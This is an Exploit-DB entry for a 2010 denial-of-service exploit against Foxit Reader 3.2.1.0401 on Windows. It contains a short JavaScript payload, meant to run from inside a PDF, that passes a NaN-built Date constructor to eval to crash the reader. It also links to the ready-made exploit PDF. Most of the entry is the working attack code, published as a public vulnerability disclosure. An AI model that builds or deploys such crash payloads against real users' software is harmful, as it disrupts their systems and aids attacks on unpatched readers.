Foxit Reader 3.2.1.0401 - Denial of Service

EDB-ID:

12080

CVE:

N/A

Author:

juza

Type:

dos

Platform:

Windows

Published:

2010-04-06

Title: Foxit Reader <= 3.2.1.0401 Denial Of Service Exploit
Date: 05/04/10
Author: juza - iamjuza[at]gmail[dot]com
Software Link: http://www.foxitsoftware.com/pdf/reader/
Version: All versions <= 3.2.1.0401 have the same issue
Tested on: Windows XP SP3 x32
Description: Just open the pdf and click in the button!
Greetz: Yux, Wisezilla, GSO, thanks for all!

Code:

function DoS( pdfDate ) {
eval("new Date(" + new Array(Number.NaN,
Number.NaN).toSource().replace(/[\[\]]/g, "") + ")" );
}

DoS("DoS");


-------------------------

Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12080.pdf

Regards

juza